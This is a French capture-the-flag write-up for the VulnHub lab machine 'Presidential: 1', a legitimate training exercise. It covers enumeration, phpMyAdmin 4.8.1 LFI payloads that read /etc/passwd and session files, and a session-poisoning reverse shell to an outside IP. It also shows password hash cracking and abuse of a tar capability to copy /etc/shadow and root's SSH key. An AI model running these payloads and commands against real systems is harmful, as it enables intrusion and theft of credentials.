Presidential: 1 VulnHub (Writeup)

Skills:

Web Enumeration
Information Leakage
Virtual Hosting
Subdomain Enumeration
Abusing phpMyAdmin - LFI to RCE (abusing PHP ID sessions)
Cracking Hashes (User Pivoting)
Abusing Capabilities (tar cap_dac_read_search+ep) [Privilege Escalation]

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Reconnaissance de l'adresse IP via arp-scan :

Utilisation de la commande arp-scan pour détecter l'adresse IP de la machine:

arp-scan -I ens33 --localnet --ignoredups

Recherche des ports ouverts avec Nmap : Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap :

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 192.168.71.145 -oG allPorts

Scan de la version des ports avec Nmap : Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p80,2082 192.168.71.145 -oN targeted

Analyse du serveur avec Wappalyzer :

Utilisation de Wappalyzer pour déterminer que le serveur utilise Apache et le langage de programmation PHP.

Identification de la version de la machine avec WhatWeb : Utilisation de WhatWeb pour scanner le site internet et identifier la version de la machine (Ubuntu) et d'Apache :

Configuration du virtual hosting pour la recherche de sous-domaines:

Avant de commencer la recherche de sous-domaines, configurez le virtual hosting pour la cible afin de mieux cibler les informations recherchées.

Identification des utilisateurs potentiels sur le site:

Explorez le site pour identifier les utilisateurs potentiels. Dans ce cas, deux utilisateurs, Kelly Bowen et Hugh Morgan, sont repérés comme des points d'intérêt.

Recherche de répertoires avec Gobuster

Utilisez Gobuster avec une liste de répertoires pour trouver des chemins d'accès cachés. Identifiez trois répertoires, dont l'un, "cgi-bin", présente un risque potentiel de vulnérabilité à l'attaque shellshock.

gobuster dir -u http://192.168.71.145/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 --add-slash

Recherche de fichiers avec extension PHP

Effectuez une recherche spécifique de fichiers avec l'extension PHP en utilisant Gobuster pour trouver des fichiers pertinents. Découvrez un fichier "config.php" qui, lorsqu'il est interprété, ne révèle aucune information visible.

gobuster dir -u http://192.168.71.145/ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 --add-slash -x php

Recherche de fichiers de sauvegarde (extension .bak)

Poursuivez la recherche en ciblant spécifiquement les fichiers de sauvegarde avec l'extension ".bak". Trouvez un fichier pertinent qui peut contenir des informations sensibles.

Obtention des identifiants de la base de données:

Utilisez les informations extraites du fichier de sauvegarde ".bak" pour obtenir les identifiants de la base de données.

Tentative de connexion SSH:

Tentez de vous connecter en utilisant les identifiants obtenus à travers SSH. Échouez dans la tentative en raison de l'absence d'une clé privée.

Vérification de la validité de l'utilisateur "votebox" sur SSH

En raison de la version ancienne de SSH, vérifiez si l'utilisateur "votebox" est un utilisateur valide du système.

Découverte des sous-domaines avec Gobuster

Utilisez Gobuster avec une liste de sous-domaines pour explorer d'éventuels sous-domaines. Cependant, cette tentative ne donne pas de résultats positifs.

gobuster vhost -u http://votenow.local/ -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 20 | grep -v "400"

Recherche alternative de sous-domaines avec un dictionnaire différent:

Répétez la recherche de sous-domaines en utilisant un dictionnaire de répertoires différent.

Identifiez vous à partir du fichier ".bak" précédemment découvert.

Identification de la vulnérabilité RCE dans phpMyAdmin

Après avoir découvert que la version de phpMyAdmin est vulnérable (4.8.1), utilisez l'outil SearchExploit pour trouver des exploits correspondants, et identifiez une vulnérabilité RCE (Remote Code Execution).

Vulnérabilité RCE:

Utilisez la vulnérabilité RCE en injectant le script suivant dans l'URL pour lire le fichier "/etc/passwd":

index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

Tentative de récupération de la clé privée SSH de l'utilisateur "admin"

Tentez d'accéder à la clé privée SSH de l'utilisateur "admin" en utilisant l'URL suivante, mais rencontrez une erreur :

index.php?target=db_sql.php%253f/../../../../../../../../home/admin/.ssh/id_rsa

Exploration des ports internes du réseau privé

Utilisez l'URL suivante pour lister les ports internes du serveur depuis le fichier /proc/net/tcp :

index.php?target=db_sql.php%253f/../../../../../../../../proc/net/tcp

Enregistrez ces ports dans un fichier "data" pour une analyse ultérieure.

for port in $(cat data | awk '{print $2}' | awk '{print $2}' FS=":" | sort -u); do echo "[+] Port $port -> $((0x$port))"; done

Identification du répertoire contenant les sessions de phpMyAdmin

En explorant le script, identifiez un répertoire contenant les sessions phpMyAdmin :

/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_{}

Vulnérabilité phpmyadmin (injection de commandes)

Utilisation du cookie de session phpMyAdmin pour une injection de commande

index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_38f8d56u6em5usl5fd9s9v3pe66qh7v1

Ce fichier interprète toutes les commandes des queries.

SELECT 'testing';

Injection de commande SQL pour obtenir un reverse shell:

select '<?php system("bash -i >& /dev/tcp/192.168.71.128/443 0>&1"); ?>';

Accès à la machine finalement réussi:

Traitement terminal pour Surmonter les Privilèges:

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Limite d'accès à /home/admin et découverte d'un mot de passe hashé:

Constatez la restriction d'accès à /home/admin, ce qui nécessite un accès authentifié. Dans phpMyAdmin, observez l'utilisateur "admin" avec un mot de passe hashé, indiquant la nécessité de déchiffrer le mot de passe pour accéder au système de fichiers.

Force brute crackage le mot de passe:

Créez un fichier "hash" contenant le mot de passe hashé et utilisez John the Ripper pour tenter de le casser en utilisant une liste de mots de passe (rockyou.txt dans cet exemple) :

john -w:/usr/share/wordlists/rockyou.txt hash

Affichage du mot de passe déchiffré

john --show hash

Migration vers l'utilisateur "admin"

Utilisez le mot de passe déchiffré pour l'utilisateur "admin" et connectez-vous au système en tant qu'administrateur

Élévation de privilèges (Capabilities)

getcap -r / 2>/dev/null

Utilisez la commande getcap pour explorer les capacités du système. Identifiez une capacité qui permet de lister tous les documents du système.

Capture du fichier /etc/shadow avec tar

Créez un dossier dans le répertoire /tmp et incluez le fichier /etc/shadow avec la commande suivante :

tarS -cvf shadow.tar /etc/shadow

Décompressez l'archive dans le répertoire /tmp. En tant que créateur, modifiez les droits pour pouvoir visualiser le contenu du fichier /etc/shadow.

tar -xvf /tmp/shadow.tar -C /tmp/
chmod 644 /tmp/etc/shadow

Capture de la clé privée .ssh avec tar

Capturez la clé privée .ssh de l'utilisateur root avec la commande suivante :

tarS -cvf id_rsa.tar /root/.ssh/id_rsa

Connexion SSH avec la clé privée capturée:

Utilisez la clé privée capturée pour établir une connexion SSH à l'utilisateur root sur la machine locale.

ssh -i id_rsa root@localhost -p 2082

Obtention de la flag : )

Mis à jour il y a 12 mois

Ce contenu vous a-t-il été utile ?